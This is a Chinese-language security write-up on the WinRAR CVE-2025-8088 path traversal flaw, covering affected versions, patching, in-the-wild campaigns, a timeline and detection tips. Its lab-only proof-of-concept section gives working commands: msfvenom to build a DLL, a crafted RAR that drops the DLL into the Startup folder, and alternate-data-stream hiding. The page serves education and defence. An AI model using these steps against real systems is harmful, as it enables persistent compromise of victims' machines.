Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal — 关于揭秘、修补和保障 WinRAR CVE-2025-8088 安全的趣味演练,融合了黑客的实操视角。 | Kitploit
工具/GitHubGitHub/adityabhatt3010/cve-2025-8088-winrar-zero-day-path-traversal
漏洞分析漏洞利用Web应用程序漏洞利用取证分析恶意软件分析渗透测试威胁情报学习与教育事件响应
GitHubadityabhatt3010/cve-2025-8088-winrar-zero-day-path-traversal

CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal

关于揭秘、修补和保障 WinRAR CVE-2025-8088 安全的趣味演练,融合了黑客的实操视角。

查看仓库
12251年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-8088:WinRAR 零日路径遍历——从零到攻破 🗿


介绍——这位“老朋友”刚刚被抓到疏忽

WinRAR——每个人都装着但没人更新的古老经典——刚刚被曝出一个高严重性零日漏洞:CVE-2025-8088。

  • 严重性: CVSS v3.1 → 8.8(高)
  • 已在野外被利用,攻击者包括 RomCom (Storm-0978) 和 Paper Werewolf。
  • 修复版本: WinRAR 7.13(2025年7月30日发布)。
  • 如果你还在用 7.12 或更低版本——你就是待宰的羔羊。

CISA 甚至把它列入已知被利用漏洞目录,修复截止日期为 2025 年 9 月 2 日。这不仅仅是理论——这是实弹射击。

封面


这是什么漏洞?🧩

  • 类型: 路径遍历
  • 花样: 使用备用数据流 (ADS) 隐藏有效载荷
  • 影响: 恶意 RAR 文件可以解压到目标文件夹之外——比如 ..\Startup\evil.dll
  • 结果: 任意文件投放 → 持久化 → 后门 → RAT 遍地。

受影响:Windows 版 WinRAR(≤7.12)、UnRAR.dll、便携版 UnRAR 安全:。

Linux、Unix、Android 版本

首先——你是否易受攻击?🕵️‍♂️

在恐慌或扮演黑客之前,检查你的版本。

如何检查:

  • 图形界面: 打开 WinRAR → 帮助 → 关于 WinRAR
  • CMD/Powershell:
root@kitploit:~
winget list WinRAR

(或从其安装目录运行 winrar.exe)

  • DLL 检查: 右键单击 UnRAR.dll → 属性 → 详细信息。

当我开始写这篇文章时,我用的还是 7.10 —— 嗯,正合时宜 🗿🐔🍗。

WinRAR 版本


如何修复(在别人修复你之前)🛡️

  1. 从以下链接下载最新版:rarlab.com/download.htm
  2. 根据系统选择 64 位或 32 位。
  3. 运行安装程序 → 它将覆盖旧版本。
  4. 验证:帮助 → 关于 WinRAR → 应该显示 7.13 或更高。
  5. 如有依赖 UnRAR.dll 的工具,请替换对应的 DLL。

WinRAR 不会自动更新——在日历上设个提醒,别成为静止的靶子。

更新后的 WinRAR 版本

PS:忽略我在这里炫耀的壁纸——总得展示一下!😏


野外利用情况 ⚔️

  • RomCom (Storm-0978): 鱼叉式钓鱼,以求职申请为诱饵,目标针对乌克兰相关实体。
  • Paper Werewolf: 紧随其后加入,针对俄罗斯组织。
  • 投放的有效载荷:SnipBot、RustyClaw、Mythic Agent 变种。
  • 将恶意 DLL/LNK 放入 %TEMP% 和启动文件夹。
  • CISA 于 2025 年 8 月 12 日列入列表 → 截止日期:2025 年 9 月 2 日。

概念验证 (PoC) – 仅限受控实验室!🧨

⚠ 免责声明: 此内容仅用于教育和授权的安全测试。不要变成小捣蛋鬼 🗿。

步骤 1:生成恶意 DLL

root@kitploit:~
msfvenom -p windows/x64/exec CMD=calc.exe -f dll > evil.dll

步骤 2:制作遍历 RAR

root@kitploit:~
winrar a -ep -ap"\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" payload.rar evil.dll

步骤 3:(可选)ADS 隐身

root@kitploit:~
type evil.dll > legit.txt:evil.dll

步骤 4:用存在漏洞的 WinRAR 解压

砰——evil.dll 出现在启动文件夹中。下次重启?你好,calc.exe。

工作流程


缓解与检测 🐺

  • 修复 → WinRAR 7.13+

  • 检查可疑的 .dll 或 .lnk 是否出现在:

    • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
    • %TEMP%
  • 监控 ADS:

    root@kitploit:~
    streams.exe -s C:\
    
  • IDS/IPS 规则:标记包含 ..\ 序列的 RAR。

  • Nessus/Qualys 插件已上线。


关键时间线

  • 2025 年 7 月 18 日 – ESET 发现活跃利用
  • 2025 年 7 月 30 日 – 发布补丁(7.13)
  • 2025 年 8 月 12 日 – 加入 CISA KEV 目录
  • 2025 年 9 月 2 日 – 联邦机构强制修复截止日期

结语——不补丁,就灭亡 🗿

这可不是一个“总有一天”的漏洞——它在披露之前就被武器化了。 如果你还在用 7.10(就像我写这篇文章时一样),现在就去打补丁。 如果你是红队成员,把这次当成一个旧工具如何成为新攻击向量的案例研究。


下载工具